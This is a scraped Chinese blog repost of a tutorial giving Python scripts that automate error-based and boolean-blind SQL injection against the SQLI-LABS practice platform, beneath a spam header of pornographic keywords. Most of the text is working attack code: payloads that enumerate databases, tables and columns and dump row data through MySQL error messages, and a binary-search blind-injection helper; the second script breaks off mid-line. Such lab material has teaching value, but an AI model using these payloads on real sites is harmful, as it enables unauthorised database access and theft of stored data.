日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > python >内容正文

python

python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现

發布時間:2023/12/9 python 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

通過前面payload的構造,不難發現,對于報錯型注入和布爾注入(sql盲注)純手工注入的效率是非常慢的。這些payload語句雖然復雜,但大部分內容都是相同的,因此,一言不合就寫了個腳本自動化注入,坐等信息爆出的感覺–>我就靜靜看著不說話_

以下兩個python腳本僅適用于SQLI-LABS,在其他平臺使用還需要做少許改動~~~

**SQLI-LABS 是一個專業的SQL注入練習平臺**

基于報錯型注入的自動化腳本(sqli-labs-master/Less-5/)

#!/usr/bin/env python

#coding=utf-8

import sys

import requests

import re

import binascii

#sys.argv[1]

# --dbs url

# --tables -D database url

# --columns -T tablename -D database url

# --dump -C columnname -T tablename -D database url

def http_get(url):
    """Perform a plain GET request against *url* and return the Response.

    Thin wrapper so that proxying (e.g. through Burp on 127.0.0.1:8080)
    can be switched on in one place for the whole script:
        proxies = {'http': 'http://127.0.0.1:8080'}
        return requests.get(url, proxies=proxies)
    """
    response = requests.get(url)
    return response

def getAllDatabases(url):
    """Enumerate every schema name via MySQL error-based injection.

    Uses the classic floor(rand(0)*2) / GROUP BY duplicate-key trick: MySQL
    echoes the selected value inside the "Duplicate entry" error message.
    Leaked values are wrapped between 0x7e7e3a7e7e markers ("~~:~~") so a
    regex can extract them from the error page.

    :param url: base SQLI-LABS URL including the injectable parameter,
                e.g. "http://host/Less-5/?id=1"
    :return: list of database names (also printed as they are found)
    """
    # First request leaks count(distinct table_schema).
    dbs_num_url = url + "'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ "
    resp = http_get(dbs_num_url)
    # .text (decoded str) rather than .content (bytes): the str regexes
    # below would raise TypeError on bytes under Python 3.
    html = resp.text
    # Error page contains e.g. "~~:~~4~~:~~".
    # Fix: the scraped original had r'~~:~~(d*?)~~:~~' — the backslash of
    # \d was stripped, so it matched a literal 'd', never a count.
    dbs_num = int(re.search(r'~~:~~(\d+)~~:~~', html).group(1))
    print(u"数据库数量: %d" % dbs_num)
    dbs = []
    print(u"数据库名: ")
    for index in range(dbs_num):
        # One request per schema name, paged with LIMIT index,1.
        db_name_url = url + "'+and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % index
        html = http_get(db_name_url).text
        db_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
        dbs.append(db_name)
        print("\t%s" % db_name)  # original "t%s" had its \t stripped by scraping
    # Fix: the list was built but never used; return it for callers.
    return dbs

def getAllTablesByDb(url, db_name):
    """Enumerate all table names of *db_name* via error-based injection.

    Same floor(rand(0)*2)/GROUP BY error-leak technique as
    getAllDatabases(); results are delimited by "~~:~~" markers.

    :param url: base injectable URL
    :param db_name: schema whose tables are listed
    """
    # Hex-encode the schema name (0x... literal) so the payload needs no
    # quote characters. Python 3: b2a_hex wants bytes and returns bytes.
    db_name_hex = "0x" + binascii.b2a_hex(db_name.encode()).decode()
    tables_num_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, count(table_name), 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % db_name_hex
    html = http_get(tables_num_url).text
    # Fix: scraped regex r'~~:~~(d*?)~~:~~' lost the backslash of \d.
    tables_num = int(re.search(r'~~:~~(\d+)~~:~~', html).group(1))
    print(u"%s 库中,表的数量: %d" % (db_name, tables_num))
    print(u"表名: ")
    for index in range(tables_num):
        tables_name_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, table_name, 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % (db_name_hex, index)
        html = http_get(tables_name_url).text
        table_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
        print("\t%s" % table_name)

def getAllColumnsByTable(url, db_name, tab_name):
    """Enumerate all column names of *db_name*.*tab_name*.

    Error-based leak as in the other helpers, but this payload variant
    delimits values with "::" (0x3a,0x3a) instead of "~~:~~".

    :param url: base injectable URL
    :param db_name: schema name
    :param tab_name: table name
    """
    # Hex-encode identifiers so the payload carries no quote characters.
    db_name_hex = "0x" + binascii.b2a_hex(db_name.encode()).decode()
    tab_name_hex = "0x" + binascii.b2a_hex(tab_name.encode()).decode()
    column_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(column_name) from information_schema.columns where table_schema=%s and table_name=%s),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex, tab_name_hex)
    html = http_get(column_num_url).text
    # Fix: scraped regex r'::(d*?)::' lost the backslash of \d.
    column_num = int(re.search(r'::(\d+)::', html).group(1))
    print(u"%s 表中,字段的数量: %d" % (tab_name, column_num))
    print(u"列名:")
    for index in range(column_num):
        column_name_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex, tab_name_hex, index)
        html = http_get(column_name_url).text
        column_name = re.search(r'::(.*?)::', html).group(1)
        print("\t%s" % column_name)

def getAllContent(url, db_name, tab_name, col_name):
    """Dump row data from *db_name*.*tab_name* via error-based injection.

    :param url: base injectable URL
    :param db_name: schema name (used unquoted in the payload)
    :param tab_name: table name
    :param col_name: column name, or several comma-separated columns,
                     e.g. "username,password"
    """
    # Leak the row count first ("::N::" in the error message).
    content_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(*) from %s.%s),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name, tab_name)
    html = http_get(content_num_url).text
    # "a,b" -> "a,0x09,b": inject a tab between columns so multi-column
    # rows come back tab-separated inside concat().
    col_name_re = col_name.replace(',', ',0x09,')
    # Fix: scraped regex r'::(d*?)::' lost the backslash of \d.
    content_num = int(re.search(r'::(\d+)::', html).group(1))
    print(u"%s 表中,行数为: %d" % (tab_name, content_num))
    for index in range(content_num):
        # One request per row, paged with LIMIT index,1.
        content_name_url = url + "' and (select 1 from (select count(*),concat((select concat(0x3a,0x3a,%s,0x3a,0x3a) from %s.%s limit %d,1), floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (col_name_re, db_name, tab_name, index)
        html = http_get(content_name_url).text
        content = re.search(r'::(.*?)::', html).group(1)
        print("\t%s" % content)

def main():
    """Dispatch on the first CLI flag.

    Positional argument scheme (flags are markers, values are positional):
      --dbs <url>
      --tables  -D <database> <url>
      --columns -T <table> -D <database> <url>
      --dump    -C <columns> -T <table> -D <database> <url>
    """
    if sys.argv[1] == '--dbs':
        getAllDatabases(sys.argv[2])
    elif sys.argv[1] == '--tables':
        # argv: --tables -D <db>(3) <url>(4)
        getAllTablesByDb(sys.argv[4], sys.argv[3])
    elif sys.argv[1] == '--columns':
        # argv: --columns -T <table>(3) -D <db>(5) <url>(6)
        getAllColumnsByTable(sys.argv[6], sys.argv[5], sys.argv[3])
    elif sys.argv[1] == '--dump':
        # argv: --dump -C <cols>(3) -T <table>(5) -D <db>(7) <url>(8)
        getAllContent(sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3])
    else:
        # Unknown flag (mojibake "參數(shù)" in the scraped original repaired).
        print(u"我不懂你的参数!")


if __name__ == '__main__':
    main()

基于bool型注入(sql盲注)的自動化腳本(sqli-labs-master/Less-8/)

#!/usr/bin/env python

#coding=utf-8

import sys

import requests

import re

import binascii

#sys.argv[1]

# --dbs url

# --tables url -D database

# --columns url -D database -T tablename

# --dump url -D database -T tablename -C columnname

def http_get(url):
    """Issue a plain GET request against *url* and return the Response."""
    response = requests.get(url)
    return response

def dichotomy(sql):
    """Binary-search the integer leaked by a boolean-blind probe.

    *sql* is a payload prefix ending in a '<' comparison; this appends
    "<mid>)--+" and checks the response. "You are in" on the page means
    the probe condition is true (value < mid), so the upper bound moves
    down; otherwise the lower bound moves up. Converges when the window
    collapses to one value.

    :param sql: payload prefix, e.g. "...?id=1' and ((select count(...)) < "
    :return: the discovered integer (search window is 1..500)
    """
    left = 1
    right = 500
    while True:
        # Fix: original py2 '/' would yield a float under py3 and break
        # both the '%d' formatting and the mid == left termination test.
        mid = (left + right) // 2
        if mid == left:
            # Window collapsed; mid is the answer. (The original had an
            # unreachable 'break' after this return — removed.)
            return mid
        probe_url = sql + "%d)--+" % mid
        html = http_get(probe_url).text  # .text: str for the regex below
        if re.search("You are in", html):
            right = mid  # condition true -> value is below mid
        else:
            left = mid   # condition false -> value is mid or above

def getAllDabatases(url):

search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata)

文章來源于互聯網,如有雷同請聯系站長刪除:三、基于報錯型注入和sql盲注的自動化實現

總結(jié)

以上是生活随笔為你收集整理的python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。